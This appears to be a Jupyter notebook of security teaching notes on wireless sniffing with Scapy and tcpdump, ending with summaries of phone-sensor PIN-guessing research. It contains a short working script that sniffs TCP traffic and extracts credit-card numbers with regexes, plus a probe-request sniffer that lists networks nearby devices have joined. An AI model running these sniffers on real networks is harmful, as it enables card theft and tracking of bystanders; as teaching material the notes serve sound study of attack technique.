Wireless Mayhem
===
On September 5, 2007, the US Secret Service arrested a wireless hacker named Max Ray Butler (Secret Service, 2007). Also known as the `Iceman`, Mr. Butler sold tens of thousands of credit card accounts through a Website. But how did he collect this private information? Sniffing unencrypted wireless Internet connections proved to be one of the methods he used to gain access to credit card information. The Iceman rented hotel rooms and apartments using false identities. He then used high-power antennae to intercept communications to the hotel’s and nearby apartments’ wireless access points to capture the personal information of its guests (Peretti, 2009). All too often, media experts classify this type of attack “sophisticated and complex.” Such a statement proves dangerous, as we can execute several of these attacks in short Python scripts. As you’ll see in the following sections, we can sniff for credit card information in less than 25 lines of code. 

In [ ]:
from IPython.display import IFrame

IFrame(src='https://127.0.0.1:8888/',width='80%',height='400pt')

Wireless Environment
---
Here, we will write code to sniff wireless traffic and send raw 802.11  frames.

In [ ]:
# Device for wireless network in Mac
!ifconfig en0

Device for wireless network in Mac
---
```
en0: flags=8863<UP,BROADCAST,SMART,RUNNING,SIMPLEX,MULTICAST> mtu 1500
	ether ff:ff:ff:ff:ff:ff 
	inet6 fe80::2acf:e9ff:fe20:ef4d%en0 prefixlen 64 scopeid 0x4 
	inet 192.168.11.7 netmask 0xffffff00 broadcast 192.168.11.255
	nd6 options=1<PERFORMNUD>
	media: autoselect
	status: active
```    

In [ ]:
# Device for wireless network in Mac while no connect
!ifconfig en0

Device for wireless network in Mac while no connect
--
```
en0: flags=8863<UP,BROADCAST,SMART,RUNNING,SIMPLEX,MULTICAST> mtu 1500
	ether ff:ff:ff:ff:ff:ff  
	nd6 options=201<PERFORMNUD,DAD>
	media: autoselect (<unknown type>)
	status: inactive
```

In [ ]:
# Device for wireless network in Linux
!ifconfig eth0

In [ ]:
!iwconfig eth0

Device for wireless network in Linux
---
```
eth0      IEEE 802.11abg  ESSID:"xxxxxxx"  
          Mode:Managed  Frequency:5.32 GHz  Access Point: ff:ff:ff:ff:ff:ff    
          Bit Rate=54 Mb/s   Tx-Power=200 dBm   
          Retry short limit:7   RTS thr:off   Fragment thr:off
          Encryption key:off
          Power Management:off
          Link Quality=54/70  Signal level=-56 dBm  
          Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0
          Tx excessive retries:0  Invalid misc:0   Missed beacon:0
```

Packets Retrieving
---
By <a href="www.tcpdump.org">tcpdump</a>, we can get packcets from internet and analyze them.
On Mac box, we could
- monitor the network flow where user travel:
```
sudo tcpdump -i en0 
```
where <font color="green">en0</font> is the recognized ethercard within Mac system;
- retrieve and save it into file:
```
sudo tcpdump -i en0 -s 0 -B 524288 -w DumpFile01.pcap
```
where  <font color="green">DumpFile01.pcap</font> is the file for data saved.
- or observe data:
```
tcpdump -s 0 -n -e -x -vvv -r DumpFile01.pcap
```

In [ ]:
import logging
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
from scapy.all import *


In [ ]:
# define the ethernetcard device here
ethernetcard='en0'

In [ ]:
def pktPrint(pkt):
    if pkt.haslayer(Dot11Beacon):
        print('[+] Detected 802.11 Beacon Frame')
    elif pkt.haslayer(Dot11ProbeReq):
        print('[+] Detected 802.11 Probe Request Frame')
    elif pkt.haslayer(TCP):
        print('[+] Detected a TCP Packet')
        exit(0)
    elif pkt.haslayer(DNS):
        print('[+] Detected a DNS Packet')


conf.iface = ethernetcard
sniff(prn=pktPrint)

Output
---
```
[+] Detected a TCP Packet
...
```

Additionally, we will need access to a Bluetooth device. To test if 
this operating system recognizes the device, run the 
command, `hciconfig`:

In [ ]:
! hciconfig

Using Python Regular Expressions to Sniff Credit Cards
---

Regular Expressions 
---

- The Visa regular expression begins with 4, followed by 12 more digits. We will accept either 0 or 1 cases of 3 more digits to ensure we have either 13 or 16 digits total in length:
```
4: begin with 4;
[0-9]{12}: followed 12 digits;
(?:[0-9]{3})?: 0 or 1 3-digits at the end.
```
where
```
[type of digits]
{length of digits}
```
- MasterCard regular expression matches the number 5, followed by 1 through 5, followed by 14 digits, for a total of 16 digits in length.
- American Express begins with 3, followed by either a 4 or 7; next, the regular expression matches13 more digits to ensure a total length of 15 digits.

In [1]:
import re
def findCreditCard(raw):
    visaRE = re.findall('4[0-9]{12}(?:[0-9]{3})?', raw)
    if visaRE:
        print('[+] Found Visa Card: ' + visaRE[0])
        

In [2]:
tests = []
tests.append('I would like to buy 1337 copies of that dvd') 
tests.append('Bill my card: 4123456789012123 for \$2600') 
for test in tests:
    findCreditCard(test)

[+] Found Visa Card: 4123456789012123


Now put them together, 
<div align="center">
<font color="red"><b>DON't DO IT ILLEGALLY!</b></font>
</div>

In [ ]:
import re

from scapy.all import *
interface='eth0'

def findCreditCard(pkt):
    raw = pkt.sprintf('%Raw.load%')
    americaRE = re.findall('3[47][0-9]{13}', raw)
    masterRE = re.findall('5[1-5][0-9]{14}', raw)
    visaRE = re.findall('4[0-9]{12}(?:[0-9]{3})?', raw)

    if americaRE:
        print('[+] Found American Express Card: ' + americaRE[0])
    if masterRE:
        print('[+] Found MasterCard Card: ' + masterRE[0])
    if visaRE:
        print('[+] Found Visa Card: ' + visaRE[0])


def main(interface):
    if interface == None:
        print('input device name')
        exit(0)
    else:
        conf.iface = interface
    try:
        print('[*] Starting Credit Card Sniffer.')
        sniff(filter='tcp', prn=findCreditCard, store=0)
    except KeyboardInterrupt:
        exit(0)



Obviously, we do not intend not for anybody to steal credit card data. In fact, this very attack landed a wireless hacker and thief named `Albert Gonzalez` in jail for over twenty years. But hopefully you realize this attack is relatively sim- ple and not as sophisticated as generally believed.

WHERE HAS YOUR Mobile device BEEN?
---
In an attempt to provide seamless connectivity, your mobile device, computer or phone, often keeps a preferred network list, which contains the names of wireless networks you have successfully connected to in the past. Either when your computer boots up or after disconnecting from a network, your computer frequently sends 802.11 Probe Requests to search for each of the network names on that list.

The following simple snippet, sniffProbe(), created to  detect 802.11 probe requests com from nearby. It will sort out
only 802.11 Probe Requests by asking the packet if it owns <i>haslayer(Dot11ProbeReq)</i>. If the request contains a new network name, we can print the network name to the screen.

In [ ]:
from scapy.all import *

interface = 'en0' 
probeReqs = []


def sniffProbe(p):
    if p.haslayer(Dot11ProbeReq):
        netName = p.getlayer(Dot11ProbeReq).info
        if netName not in probeReqs:
            probeReqs.append(netName)
            print('[+] Detected New Probe Request: ' + netName)


In [ ]:
sniff(iface=interface, prn=sniffProbe)

Recent Reports
===
Malicious accessing Cell Phones
---
1. 2017/September, Princeton researchers silently collected data from a phone's sensors to successfully infer a user's geographical location without asking the test subject for permission to access his phone's GPS tracking component.

-  2017/April, scientists from the University of Newcastle in the UK created a JavaScript file that could be embedded in web pages or malicious apps and could silently log sensor data to train a similar algorithm that can guess PINs and passwords.
- 2017/December, Team of Nanyang Technological University (NTU) in Singapore published its paper [There Goes Your PIN: Exploiting Smartphone Sensor Fusion Under Single and Cross User Setting].
       
        The three scientists behind this work are only the most recent group of researchers that have noticed a glaring security hole in the design of modern mobile operating systems such as Android and iOS.

        Researchers say that these operating systems do not require apps to ask users for permissions before accessing sensor data.


Sensors provide unique data fingerprint for each key tap
---

NTU team created an Android app that they installed on test devices that silently collected data from six sensors: accelerometer, gyroscope, magnetometer, proximity sensor, barometer, and ambient light sensor.

The algorithm analyzed the collected sensor data and was able to distinguish between presses on different keys by looking at device tilt (space and angle-related coordinates) and nearby ambient light whenever the user moved his finger over the phone's touchscreen to enter the PIN and unlocked the device.

During their experiment, the research team used sensor data only from 500 random PIN-entry operations supplied by three candidates, meaning the algorithm could become more accurate as it collected more data.

Based on the research team's samples, the algorithm was able to guess a PIN code with a 99.5% accuracy on the first try using PINs from a list of the 50 most common PIN numbers. Previous research had a success rate of 74% using the same list of the 50 most common PIN numbers, the research team said.

The success rate went down from 99.5% to 83.7% when researchers tried to guess all 10,000 possible combinations of four-digit PINs within 20 tries.

"Moreover, with the underlying agile methodology, the technique can be easily scaled up to longer PINs," researchers said.